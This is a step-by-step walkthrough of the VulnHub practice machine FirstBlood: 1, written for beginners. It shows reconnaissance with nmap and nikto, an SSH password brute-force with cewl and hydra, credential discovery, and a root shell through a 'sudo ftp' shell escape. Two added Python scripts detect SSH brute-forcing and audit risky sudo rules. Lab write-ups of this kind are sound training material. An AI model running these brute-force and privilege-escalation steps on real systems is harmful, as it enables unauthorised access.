VulnHub machine: FIRSTBLOOD: 1

Introduction: this box is fairly easy, because every step comes with a hint and the basic commands are handed to you.

1. Find the target's IP: 192.168.74.130

nmap -sn 192.168.74.0/24

2. Scan the target's ports: port 80 (HTTP) and port 60022 (SSH) are open

root@kali:~# nmap -A -p- 192.168.74.130
Starting Nmap 7.80 ( https://nmap.org ) 
Nmap scan report for 192.168.74.130
Host is up (0.00044s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.14.0 (Ubuntu)
| http-robots.txt: 1 disallowed entry 
|_/johnnyrambo/
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Welcome to FirstBlood!
60022/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:01:d8:27:53:50:d9:e1:9a:cb:9d:1e:4c:b0:a5:ae (RSA)
|   256 4b:c8:77:49:db:5f:38:7f:36:e1:49:da:a4:a1:7c:5d (ECDSA)
|_  256 36:c8:65:e1:45:9a:9c:66:c9:c9:21:c4:5a:25:4d:76 (ED25519)
MAC Address: 00:0C:29:0E:84:DE (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=9/25%OT=80%CT=1%CU=39338%PV=Y%DS=1%DC=D%G=Y%M=000C29%T
OS:M=5F6D7C7E%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10C%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms 192.168.74.130

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.80 seconds

3. Visit port 80 first. The landing page is a wall of English text; the key point is the hint to press Ctrl+U and view the page source.

Just follow along: the source reveals a file named rambo.html.

Visiting it gives another wall of English text. It hints that an nmap scan without extra options only shows port 80 open, but adding -p- reveals a second port. I always scan the full port range anyway, so that hint was of no use to me. It also says that running nikto will reveal a directory.

Below is the nikto output; it reports a johnnyrambo directory. But our earlier nmap scan had already pulled that entry out of robots.txt, so this step can be skipped as well.

root@kali:~# nikto -h http://192.168.74.130
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.74.130
+ Target Hostname:    192.168.74.130
+ Target Port:        80
---------------------------------------------------------------------------
+ Server: nginx/1.14.0 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry ' /johnnyrambo/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ 7916 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2020-09-25 15:39:22 (GMT8) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# 

Visiting that directory gives, sure enough, yet another wall of English. The key information sits just above the red text: first generate a wordlist with cewl, then use it to brute-force the SSH password.

3. Generate the wordlist. Before brute-forcing we also need a username. A cheap trick: once the VM has booted, its console login screen lists every user that can log in, and from the earlier hints johnny is the obvious guess. Also remember to specify the port as 60022, the one found in the earlier scan. Then hydra can be run directly, and it finds the password very quickly.

root@kali:~# cewl -w words.txt -d 1 -m 5 http://192.168.74.130/johnnyrambo/
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
root@kali:~# wc -l words.txt 
137 words.txt
root@kali:~# hydra -l johnny -P words.txt -s 60022 ssh://192.168.74.130
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-25 15:47:21
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 137 login tries (l:1/p:137), ~9 tries per task
[DATA] attacking ssh://192.168.74.130:60022/
[60022][ssh] host: 192.168.74.130   login: johnny   password: Vietnam
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 0 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished 
root@kali:~# 
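The hydra run above leaves a very recognisable trace on the target: a burst of "Failed password" lines from one source address, followed by an "Accepted password" line once the wordlist hits. As an added example (not part of the original writeup), the following Python detector parses constructed sshd auth.log lines in that shape, flags any source address that exceeds a failure threshold inside a sliding time window, and reports whether a successful login followed the burst. The log lines, the threshold and the window are all assumptions made for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of OpenSSH auth.log lines (sample data, not captured from the FirstBlood box).
# Eight failures in three seconds followed by an "Accepted" line, the shape a hydra run leaves
# behind, plus a few slow, unrelated failures from a second address.
SAMPLE_AUTH_LOG = """\
Sep 25 15:47:21 firstblood sshd[1201]: Failed password for johnny from 192.168.74.128 port 40010 ssh2
Sep 25 15:47:21 firstblood sshd[1202]: Failed password for johnny from 192.168.74.128 port 40011 ssh2
Sep 25 15:47:21 firstblood sshd[1203]: Failed password for johnny from 192.168.74.128 port 40012 ssh2
Sep 25 15:47:22 firstblood sshd[1204]: Failed password for johnny from 192.168.74.128 port 40013 ssh2
Sep 25 15:47:22 firstblood sshd[1205]: Failed password for johnny from 192.168.74.128 port 40014 ssh2
Sep 25 15:47:22 firstblood sshd[1206]: Failed password for johnny from 192.168.74.128 port 40015 ssh2
Sep 25 15:47:23 firstblood sshd[1207]: Failed password for johnny from 192.168.74.128 port 40016 ssh2
Sep 25 15:47:23 firstblood sshd[1208]: Failed password for johnny from 192.168.74.128 port 40017 ssh2
Sep 25 15:47:24 firstblood sshd[1209]: Accepted password for johnny from 192.168.74.128 port 40018 ssh2
Sep 25 15:50:02 firstblood sshd[1300]: Failed password for root from 192.168.74.50 port 51000 ssh2
Sep 25 15:55:40 firstblood sshd[1301]: Failed password for invalid user admin from 192.168.74.50 port 51001 ssh2
Sep 25 16:01:13 firstblood sshd[1302]: Failed password for root from 192.168.74.50 port 51002 ssh2
"""

# One sshd password-auth line; "invalid user" appears when the account does not exist at all.
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_events(log_text):
    """Yield (timestamp, ip, user, result) for each sshd password line; other lines are ignored."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; a fixed year is fine for measuring gaps within one log
        ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
        yield ts, m.group("ip"), m.group("user"), m.group("result")


def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {ip: summary} for each source address with at least `threshold` failed password
    attempts inside any window of `window_seconds`. 'success_after' is True when the same
    address later produced an Accepted login, which is the case that needs immediate attention."""
    by_ip = defaultdict(list)
    for ts, ip, user, result in parse_events(log_text):
        by_ip[ip].append((ts, user, result))

    findings = {}
    window = timedelta(seconds=window_seconds)
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e[0])
        failures = [ts for ts, _, result in events if result == "Failed"]
        # sliding window over the sorted failure timestamps
        burst = False
        start = 0
        for end in range(len(failures)):
            while failures[end] - failures[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst = True
                break
        if not burst:
            continue
        first_fail = failures[0]
        success_after = any(result == "Accepted" and ts >= first_fail for ts, _, result in events)
        findings[ip] = {
            "failed": len(failures),
            "users": sorted({user for _, user, result in events if result == "Failed"}),
            "success_after": success_after,
        }
    return findings


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {info['failed']} failures against {info['users']}, "
              f"login succeeded afterwards: {info['success_after']}")
```

With the defaults, only 192.168.74.128 is reported, because the three failures from 192.168.74.50 are spread over ten minutes; lowering the threshold and widening the window surfaces that address too, without the success flag. The same counting is what fail2ban or an SSH rate limit would act on, and moving SSH to 60022, as this box does, changes nothing about it.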

Step 2 actually gave a hint about this too: the ssh.html page yields the next hint and the username.

4. Log in over SSH with johnny/Vietnam and look at the files in the home directory.

root@kali:~# ssh 192.168.74.130 -p 60022
The authenticity of host '[192.168.74.130]:60022 ([192.168.74.130]:60022)' can't be established.
ECDSA key fingerprint is SHA256:9NWBNQ2bI/RnipoZ6hHKjL8BZq69S71dcT42eAnvjpg.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.74.130]:60022' (ECDSA) to the list of known hosts.
johnny@192.168.74.130's password: Vietnam (typed, not echoed)
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-88-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Fri Sep 18 15:29:53 2020 from 192.168.86.109
johnny@firstblood:~$ ls
README.txt

There is a README.txt; its contents tell us to look at the configuration file to find the web root.

johnny@firstblood:~$ cat README.txt 

Nice job!  You're cruising along nicely!

When we find ourselves on a web server, we want to check out the web directory.  

In case you haven't figured it out, this server is running Nginx.  For this particular
setup, I've left things at the default.  If we look in the configuration file, we can
view the location of the web directory:

cat /etc/nginx/sites-enabled/default

That's kind of noisy in the output.  We can clean it up with the following:

cat /etc/nginx/sites-enabled/default | grep -v "#"

-v is an invert match and will essentially remove all of the comment (#) lines.

When we clean it up, the line starting with "root" points to the web directory.

Move into the web directory and see if there are any files to read...

5. Read the configuration file to get the web root (it is just the default). Move into that directory, where there is yet another README.txt.

johnny@firstblood:~$ cat /etc/nginx/sites-enabled/default | grep -v "#"

server {
        listen 80 default_server;
        listen [::]:80 default_server;


        root /var/www/html;

        index index.html index.htm index.nginx-debian.html;

        server_name _;

        location / {
                try_files $uri $uri/ =404;
        }


}


johnny@firstblood:~$ cd /var/www/html
johnny@firstblood:/var/www/html$ ls
index.nginx-debian.html  johnnyrambo  rambo.html  README.txt  robots.txt

Its contents tell us to find another README.txt that we are able to read.

johnny@firstblood:/var/www/html$ cat README.txt 
Hack the Planet!

Nice work!

I've hidden a file on this server which is readable by you.  Seems like a needle in the haystack, no?

We can use the "find" command to find files.  If I wanted to find the /etc/passwd file:

find /etc -name passwd -print

^^ would generate some permission denied errors along with the correct response.

We can redirect errors:

find /etc -name passwd -print 2>/dev/null

That last part:  2>/dev/null

^^ will redirect errors to the same place where unicorn crap ends up.  It's magic.  Don't question me.

If we run the following:

find / -type f -readable 2>/dev/null

We are going to get a LOT of noise.  

However, if we fine tune this a bit:

find / -type f -readable 2>/dev/null | grep README.txt

-type f stands for type file
-readable stands for readable by this current user
| grep README.txt is a way to redirect the output to grep for a string match, the string being README.txt

We can narrow down the list.  Find the file, read the contents.

6. Use find to locate the other README.txt.

johnny@firstblood:/var/www/html$ find / -type f -readable 2>/dev/null | grep README.txt
/opt/README.txt
/var/www/html/README.txt
/home/johnny/README.txt

Its contents give another username and password.

johnny@firstblood:/var/www/html$ cat /opt/README.txt 

There's another user on this server that might have greater privileges:

username:  blood
password:  HackThePlanet2020!!

You can either switch users or ssh as the new user.  If you know how to do both, pick one.
If you only know how to SSH, learn to switch users.  

7. Switch straight to the blood user and go to its home directory. There is another README.txt here; it says there is one more user under /home and tells us to try to read the files in that user's home directory.

johnny@firstblood:/var/www/html$ su blood
Password: HackThePlanet2020!! (typed, not echoed)
blood@firstblood:/var/www/html$ cd ~
blood@firstblood:~$ ls
README.txt
blood@firstblood:~$ cat README.txt 

I didn't think you needed to be told about the README.txt file.

I'm really stoked that you're cruising along.  Nice work!

If you move into the /home directory, we can see the home directories for the other
users on this server.  There's a user directory with some text files.  Attempt to 
read both files.

Change to /home. The sly directory is readable; inside are two files, but only one of them can be read.

blood@firstblood:~$ cd /home
blood@firstblood:/home$ ls -la
total 24
drwxr-xr-x  6 root       root       4096 Sep 18 14:24 .
drwxr-xr-x 23 root       root       4096 Sep 18 11:26 ..
drwxr-xr-x  4 blood      blood      4096 Sep 18 15:23 blood
drwx------ 17 firstblood firstblood 4096 Sep 18 11:45 firstblood
drwxr-xr-x  6 johnny     johnny     4096 Sep 18 15:24 johnny
drwxr-xr-x  4 sly        sly        4096 Sep 18 15:26 sly
blood@firstblood:/home/sly$ ls -l
total 8
-rw-rw-r-- 1 sly sly 583 Sep 18 15:26 README_FIRST.txt
-rw------- 1 sly sly 304 Sep 18 15:25 README.txt

README_FIRST.txt tells us to list our sudo privileges with sudo -l.

blood@firstblood:/home/sly$ cat README_FIRST.txt 

Obviously, you're able to read this file but you're unable to read the other because
you don't have permissions.  If you perform an:  ls -al

You can see that only the user sly has permission to read README.txt

Hold that thought for a moment...

In some instances we need to perform tasks as other users or even root sometimes.
We can see if we have those permissions by typing:

sudo -l

-l stands for list, as in -- list our permissions  

We discover that we have the ability to run a command as sly that might help us.

Figure out how to execute that command as the user sly.

8. sudo -l shows that we can read the README.txt above as sly. In it we find sly's password and a website that may help with escalating to root, and sudo is needed once again.

blood@firstblood:/home/sly$ sudo -l
Matching Defaults entries for blood on firstblood:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User blood may run the following commands on firstblood:
    (sly) /bin/cat /home/sly/README.txt
    (root) NOPASSWD: /usr/bin/esudo-properties
blood@firstblood:/home/sly$ sudo -u sly /bin/cat /home/sly/README.txt 
[sudo] password for blood: HackThePlanet2020!! (typed, not echoed)

In case I forget, my password is:  SylvesterStalone

PS -- I think root gave us sudo privileges.  I think this might be dangerous though
because I found a website:  https://gtfobins.github.io/

It shows a possible privilege escalation for root.  I'm totally going to check out
root's files.  hint hint

9. Switch to sly and run sudo -l again: there is an ftp command that may be run as any user.

blood@firstblood:/home/sly$ su sly
Password: SylvesterStalone (typed, not echoed)
sly@firstblood:~$ sudo -l
Matching Defaults entries for sly on firstblood:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sly may run the following commands on firstblood:
    (ALL) /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/esudo-properties
sly@firstblood:~$
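The two sudo -l listings above are the root cause of this box: a rule that hands an interactive program (ftp) to a user, and a NOPASSWD rule for a binary that root set up without thinking about it. As an added example (not from the original writeup), the following Python script parses sudo -l output of exactly this shape and flags the rules an administrator should review: programs that GTFOBins documents as able to spawn a shell, rules that pin no arguments (sudoers then accepts any arguments), and NOPASSWD grants. The two listings from the writeup are embedded as the sample input; the set of shell-capable binaries is a partial list assembled for this example.

```python
import re
from os.path import basename

# Binaries that GTFOBins documents as able to spawn a shell when run under sudo (partial list
# assembled for this example). A rule that grants one of them is effectively a grant of an
# interactive shell as the run-as user, which is exactly the ftp case on this box.
SHELL_ESCAPE_BINARIES = {
    "ftp", "vi", "vim", "less", "more", "man", "find", "awk", "perl",
    "python", "python3", "bash", "sh", "env", "nmap", "tar", "zip",
}

# One rule line of `sudo -l` output, e.g. "(root) NOPASSWD: /usr/bin/esudo-properties"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s+(?:(?P<nopasswd>NOPASSWD):\s*)?(?P<cmd>\S.*?)\s*$"
)

# The two `sudo -l` outputs from the writeup, embedded here as sample input.
# Raw strings keep the "\:" separators in secure_path from being read as escapes.
BLOOD_SUDO_L = r"""Matching Defaults entries for blood on firstblood:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User blood may run the following commands on firstblood:
    (sly) /bin/cat /home/sly/README.txt
    (root) NOPASSWD: /usr/bin/esudo-properties
"""

SLY_SUDO_L = r"""Matching Defaults entries for sly on firstblood:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sly may run the following commands on firstblood:
    (ALL) /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/esudo-properties
"""


def parse_sudo_l(output):
    """Return [(runas_user, nopasswd, command), ...] from the rule block of `sudo -l` output.
    Only lines after the 'User X may run the following commands' header are considered."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            # "(ALL : ALL)" carries a run-as group after the colon; keep only the user part
            runas = m.group("runas").split(":")[0].strip()
            rules.append((runas, m.group("nopasswd") is not None, m.group("cmd")))
    return rules


def audit_rules(rules):
    """Return [(command, [reasons]), ...] for every rule that deserves review."""
    findings = []
    for runas, nopasswd, cmd in rules:
        reasons = []
        argv = cmd.split()
        binary = basename(argv[0])
        if binary in SHELL_ESCAPE_BINARIES:
            target = "root" if runas == "ALL" else runas
            reasons.append(f"{binary} can spawn a shell (GTFOBins): effectively a full shell as {target}")
        if len(argv) == 1:
            # sudoers treats a command listed without arguments as "any arguments allowed"
            reasons.append("no arguments pinned in the rule, so any arguments are accepted")
        if nopasswd:
            reasons.append("NOPASSWD: runs without re-authentication, so a stolen session is enough")
        if reasons:
            findings.append((cmd, reasons))
    return findings


if __name__ == "__main__":
    for label, output in (("blood", BLOOD_SUDO_L), ("sly", SLY_SUDO_L)):
        print(f"== sudo -l for {label} ==")
        for cmd, reasons in audit_rules(parse_sudo_l(output)):
            print(f"  {cmd}")
            for reason in reasons:
                print(f"    - {reason}")
```

For blood, the cat rule passes (a specific file argument, no shell escape) and only the NOPASSWD rule is reported; for sly, the ftp rule is reported as a full shell as root. The fix on a real system is to grant a wrapper script that does only the intended job rather than an interactive client, and to drop NOPASSWD unless the command is genuinely harmless.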

So we can escalate privileges directly through ftp (that website lists many commands that can be used to escalate). Once root, go to root's home directory and read the final README.txt.

sly@firstblood:~$ sudo ftp
[sudo] password for sly: SylvesterStalone (typed, not echoed)
ftp> !/bin/bash
root@firstblood:~# cd /root
root@firstblood:/root# ls
README.txt
root@firstblood:/root# cat README.txt
______ _          _  ______ _                 _ 
|  ___(_)        | | | ___ \ |               | |
| |_   _ _ __ ___| |_| |_/ / | ___   ___   __| |
|  _| | | '__/ __| __| ___ \ |/ _ \ / _ \ / _` |
| |   | | |  \__ \ |_| |_/ / | (_) | (_) | (_| |
\_|   |_|_|  |___/\__\____/|_|\___/ \___/ \__,_|
                                                
                                                
____    ______            _           _     ____
\ \ \   | ___ \          | |         | |   / / /
 \ \ \  | |_/ /___   ___ | |_ ___  __| |  / / / 
  > > > |    // _ \ / _ \| __/ _ \/ _` | < < <  
 / / /  | |\ \ (_) | (_) | ||  __/ (_| |  \ \ \ 
/_/_/   \_| \_\___/ \___/ \__\___|\__,_|   \_\_\
                                                

I hope you enjoyed this box.  I wanted to create something
on the easier side because I know how frustrating and
rewarding the process can be.  If you liked this box
please reach out to me on Twitter and let me know:

@iamv1nc3nt

10. Summary

The difficulty and the amount of hand-holding make this box a good one for beginners, and for anyone interested in this area who is just getting started.
